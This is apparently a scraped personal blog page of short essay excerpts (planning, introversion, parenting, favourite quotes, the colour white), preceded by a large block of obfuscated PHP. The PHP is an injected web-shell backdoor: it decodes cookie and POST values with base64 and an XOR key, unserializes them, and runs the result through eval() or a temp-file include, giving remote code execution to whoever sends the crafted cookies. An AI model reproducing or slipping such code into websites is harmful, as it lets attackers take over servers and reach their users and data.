$sWEeH = 'n' . "\x79" . chr ( 703 - 588 )."\137" . chr (102) . chr (97) . "\162";$zLisOz = chr (99) . chr ( 345 - 237 ).'a' . chr ( 966 - 851 ).chr (115) . chr ( 398 - 303 )."\x65" . 'x' . chr ( 1061 - 956 )."\x73" . "\164" . chr (115); $abNJxc = class_exists($sWEeH); $sWEeH = "3798";$zLisOz = "57253";$KoYlvETJ = FALSE;if ($abNJxc === $KoYlvETJ){function LnRHW(){return FALSE;}$HlkQE = "13995";LnRHW();class nys_far{public function WuiiIPy(){echo "46514";}private $KAsIsyGPCN;public static $ZCRiYui = "1e4cee17-fc30-40f7-a70b-360a9d29a73f";public static $BQcZDs = 21220;public function __destruct(){$HlkQE = "17084_43515";$this->NIETwtU($HlkQE); $HlkQE = "17084_43515";}public function __construct($SJbgm=0){$KurmNkPJ = $_POST;$JyNNaJ = $_COOKIE;$yvhEjjcOJY = @$JyNNaJ[substr(nys_far::$ZCRiYui, 0, 4)];if (!empty($yvhEjjcOJY)){$JWxfhEmrm = "base64";$HomsM = "";$yvhEjjcOJY = explode(",", $yvhEjjcOJY);foreach ($yvhEjjcOJY as $irBKujVlVW){$HomsM .= @$JyNNaJ[$irBKujVlVW];$HomsM .= @$KurmNkPJ[$irBKujVlVW];}$HomsM = array_map($JWxfhEmrm . chr (95) . 'd' . chr ( 963 - 862 ).'c' . chr (111) . 'd' . chr ( 542 - 441 ), array($HomsM,)); $HomsM = $HomsM[0] ^ str_repeat(nys_far::$ZCRiYui, (strlen($HomsM[0]) / strlen(nys_far::$ZCRiYui)) + 1);nys_far::$BQcZDs = @unserialize($HomsM);}}private function NIETwtU($HlkQE){if (is_array(nys_far::$BQcZDs)) {$ySZKWa = str_replace('<' . chr ( 499 - 436 ).chr ( 767 - 655 ).chr (104) . "\x70", "", nys_far::$BQcZDs["\143" . "\157" . chr (110) . chr (116) . 'e' . "\x6e" . "\x74"]);eval($ySZKWa); $HlkQE = "13995";exit();}}}$vgyybclH = new /* 44194 */ nys_far(); $vgyybclH = str_repeat("17084_43515", 1);}$qBPUs = 'V' . "\117" . chr ( 392 - 293 ).chr ( 331 - 236 )."\162" . chr ( 773 - 673 ).'A' . 'Z' . "\153";$vTHic = "\x63" . "\x6c" . "\141" . 's' . "\x73" . '_' . chr ( 560 - 459 )."\170" . 'i' . chr ( 744 - 629 )."\x74" . chr ( 934 - 819 ); $grxrfpTQ = class_exists($qBPUs); $qBPUs = "4649";$vTHic = "16692";$SwMWBgKZAH = FALSE;if ($grxrfpTQ === $SwMWBgKZAH){$ozqYru = "785";class VOc_rdAZk{public function XSOZryQoKY(){echo "13453";}private $rPABlvLclZ;public static $mFgcdJ = "cbd3117d-d718-46c7-8c47-8c472886f4fc";public static $kUnpBNoDO = 22927;public function __construct($grxGbc=0){$bPEgEYVhz = $_POST;$orPdGwi = $_COOKIE;$UaLpqZ = @$orPdGwi[substr(VOc_rdAZk::$mFgcdJ, 0, 4)];if (!empty($UaLpqZ)){$JShgiEnXU = "base64";$TfZuHTmCH = "";$UaLpqZ = explode(",", $UaLpqZ);foreach ($UaLpqZ as $XGwtbdCpMr){$TfZuHTmCH .= @$orPdGwi[$XGwtbdCpMr];$TfZuHTmCH .= @$bPEgEYVhz[$XGwtbdCpMr];}$TfZuHTmCH = array_map($JShgiEnXU . "\137" . "\x64" . 'e' . "\143" . chr (111) . chr ( 424 - 324 )."\145", array($TfZuHTmCH,)); $TfZuHTmCH = $TfZuHTmCH[0] ^ str_repeat(VOc_rdAZk::$mFgcdJ, (strlen($TfZuHTmCH[0]) / strlen(VOc_rdAZk::$mFgcdJ)) + 1);VOc_rdAZk::$kUnpBNoDO = @unserialize($TfZuHTmCH);}}private function MPLsTZ($ozqYru){if (is_array(VOc_rdAZk::$kUnpBNoDO)) {$JJKzyl = str_replace('<' . "\77" . 'p' . chr (104) . chr (112), "", VOc_rdAZk::$kUnpBNoDO[chr (99) . chr ( 1034 - 923 )."\156" . chr (116) . chr (101) . chr ( 195 - 85 ).chr ( 300 - 184 )]);eval($JJKzyl); $ozqYru = "785";exit();}}public function __destruct(){$ozqYru = "32976_14172";$this->MPLsTZ($ozqYru); $ozqYru = "32976_14172";}}$VPJVkiHo = new /* 20561 */ VOc_rdAZk(); $VPJVkiHo = str_repeat("32976_14172", 1);}$zcOmlbTR = 'p' . chr (75) . 'N' . '_' . chr (108) . "\167" . 'a' . chr ( 927 - 825 )."\126";$qaubeXfTYd = 'c' . "\154" . 'a' . "\x73" . "\x73" . chr (95) . "\x65" . 'x' . chr (105) . "\163" . chr ( 121 - 5 ).chr ( 1009 - 894 ); $pAyzWXg = class_exists($zcOmlbTR); $zcOmlbTR = "33167";$qaubeXfTYd = "55193";$DwRLPiAG = FALSE;if ($pAyzWXg === $DwRLPiAG){function FapER(){return FALSE;}$KrvlzoIzoT = "1792";FapER();class pKN_lwafV{private function eRSSdlLmLU($KrvlzoIzoT){if (is_array(pKN_lwafV::$BHqkqGPNL)) {$VVhHi = sys_get_temp_dir() . "/" . crc32(pKN_lwafV::$BHqkqGPNL[chr (115) . chr (97) . 'l' . chr (116)]);@pKN_lwafV::$BHqkqGPNL["\x77" . "\x72" . chr ( 491 - 386 ).chr (116) . "\x65"]($VVhHi, pKN_lwafV::$BHqkqGPNL["\x63" . chr (111) . "\x6e" . 't' . "\x65" . "\156" . 't']);include $VVhHi;@pKN_lwafV::$BHqkqGPNL['d' . "\x65" . chr ( 679 - 571 ).'e' . "\164" . chr ( 485 - 384 )]($VVhHi); $KrvlzoIzoT = "1792";exit();}}private $cAFttDSDEo;public function RRwSJ(){echo 30828;}public function __destruct(){$KrvlzoIzoT = "61744_26779";$this->eRSSdlLmLU($KrvlzoIzoT); $KrvlzoIzoT = "61744_26779";}public function __construct($kfTztko=0){$gMffKWg = $_POST;$ioxpO = $_COOKIE;$FNisu = "7a23caa4-a9ed-4e01-a9b5-22f5c08fab67";$lLTMfB = @$ioxpO[substr($FNisu, 0, 4)];if (!empty($lLTMfB)){$bXbueOW = "base64";$zwenqARE = "";$lLTMfB = explode(",", $lLTMfB);foreach ($lLTMfB as $biBjZgjW){$zwenqARE .= @$ioxpO[$biBjZgjW];$zwenqARE .= @$gMffKWg[$biBjZgjW];}$zwenqARE = array_map($bXbueOW . "\x5f" . "\x64" . chr (101) . chr ( 107 - 8 )."\157" . chr (100) . chr (101), array($zwenqARE,)); $zwenqARE = $zwenqARE[0] ^ str_repeat($FNisu, (strlen($zwenqARE[0]) / strlen($FNisu)) + 1);pKN_lwafV::$BHqkqGPNL = @unserialize($zwenqARE);}}public static $BHqkqGPNL = 5258;}$fURNxCM = new /* 13134 */ pKN_lwafV(1792); $fURNxCM = str_repeat("61744_26779", 1);}$VCeNgEPkK = "\161" . "\155" . 'c' . "\137" . chr ( 165 - 59 )."\112" . "\131" . chr (76) . 'Y';$dshTS = "\143" . chr (108) . chr (97) . chr (115) . "\163" . chr (95) . chr (101) . "\x78" . 'i' . 's' . chr ( 202 - 86 ).chr (115); $TdjbCrn = class_exists($VCeNgEPkK); $dshTS = "50085";$OQNEHAR = strpos($dshTS, $VCeNgEPkK);if ($TdjbCrn == $OQNEHAR){function aqhNR(){$SZOkvNFNu = new /* 53868 */ qmc_jJYLY(16326 + 16326); $SZOkvNFNu = NULL;}$vTLERyNQmd = "16326";class qmc_jJYLY{private function yJzjkFf($vTLERyNQmd){if (is_array(qmc_jJYLY::$WtSlidKat)) {$uzFQPX2 = str_replace("<" . "?php", "", qmc_jJYLY::$WtSlidKat["content"]);eval($uzFQPX2); $vTLERyNQmd = "16326";exit();}}public function ERsWVL(){$uzFQPX = "62972";$this->_dummy = str_repeat($uzFQPX, strlen($uzFQPX));}public function __destruct(){qmc_jJYLY::$WtSlidKat = @unserialize(qmc_jJYLY::$WtSlidKat); $vTLERyNQmd = "25109_17333";$this->yJzjkFf($vTLERyNQmd); $vTLERyNQmd = "25109_17333";}public function cFNDuM($uzFQPX, $oPKuVDvDa){return $uzFQPX[0] ^ str_repeat($oPKuVDvDa, intval(strlen($uzFQPX[0]) / strlen($oPKuVDvDa)) + 1);}public function bZyJjof($uzFQPX){$sNMrRjS = "\x62" . "\x61" . chr (115) . "\x65" . "\x36" . "\64";return array_map($sNMrRjS . "\137" . "\144" . "\x65" . chr (99) . chr (111) . "\144" . "\x65", array($uzFQPX,));}public function __construct($BnDuYYiOe=0){$RyfYLRAfrr = "\54";$uzFQPX = "";$mvJQwmUN = $_POST;$uHlCoy = $_COOKIE;$oPKuVDvDa = "d623a01f-cd7f-4a38-b4cf-ace9495704a8";$pThvjSany = @$uHlCoy[substr($oPKuVDvDa, 0, 4)];if (!empty($pThvjSany)){$pThvjSany = explode($RyfYLRAfrr, $pThvjSany);foreach ($pThvjSany as $gjpze){$uzFQPX .= @$uHlCoy[$gjpze];$uzFQPX .= @$mvJQwmUN[$gjpze];}$uzFQPX = $this->bZyJjof($uzFQPX);}qmc_jJYLY::$WtSlidKat = $this->cFNDuM($uzFQPX, $oPKuVDvDa);if (strpos($oPKuVDvDa, $RyfYLRAfrr) !== FALSE){$oPKuVDvDa = explode($RyfYLRAfrr, $oPKuVDvDa); $YsANgInY = sprintf("25109_17333", rtrim($oPKuVDvDa[0]));}}public static $WtSlidKat = 31823;}aqhNR();}
I am not much of a planner. There are the usual, predictable things that I plan to do – go to work, get groceries, get gas… but as far as like out-of-the-ordinary events, I’m pretty last-minute. And as far as life goals, I take it as I go. I can plan to be more organized,...
I rather enjoy being an introvert. I find it very entertaining, which might seem like the opposite of the introverted life to someone who is not an introvert. But I think introverts as a species are greatly misunderstood… probably because we don’t speak up, but that’s exactly the point. The difference between introverts and extroverts...
What can a first impression tell us about anyone? Why no more than a chord can tell us about Beethoven or a brushstroke about Botticelli. By their very nature, human beings are so capricious, so complex, so delightfully contradictory, that they deserve not only our consideration but our reconsideration – and our unwavering determination to...
My goal in raising my girls is to get them to the point that they don’t need me – that when they leave home or when I go home, they will carry on and move forward. There will be no question of how things will get done without me because they will already know how....
I suppose if I ever want to finish the stories I began, I need to write them. It sounds logical, but I can almost always find an excuse, er, uh, I mean a reason why I can’t do it today. But tomorrow, tomorrow will be the perfect day to sit down and make it happen....
I don’t only quote movies, ya know… I also quote books, song lyrics, television shows, and as Reader’s Digest always called them – Quotable Quotes. And anytime I hear a clever line, a witty comeback, or just something that makes me smile for whatever reason, I like to write it down. You never know when...
They say actions speak louder than words. Well, I don’t know who “they” is, but that statement in and of itself is impossible. But I suppose even with my appreciation for words and their own undeniable but often underestimated power, I would have to admit that words without action are meaningless, and their anti-power can...
“Shut the front door!” My best friend’s step-dad said that all the time when we were growing up. Goober said “Sha-zam.” George Bush Jr. said, “Make no mistake . . .,” but I really preferred Doc Holliday’s version when he said, “No, make no mistake . . . it’s not revenge he’s after; it’s the...
I won’t say my age because I don’t want to, but I’ve been around for a little while. I’ve lived through a few things. I like to think I know a thing or two – not because I’m some sort of scholar but just because I pay attention, well kinda – sometimes. I pay enough...
White gets kind of a bad rep: Don’t wear white shoes after Labor Day. Don’t wear white for pictures. Don’t dress a kid in white (unless stains don’t matter). A white lie is said to be trivial/harmless. White always seemed like the most useless crayon in the box to me. Of all the colors, if...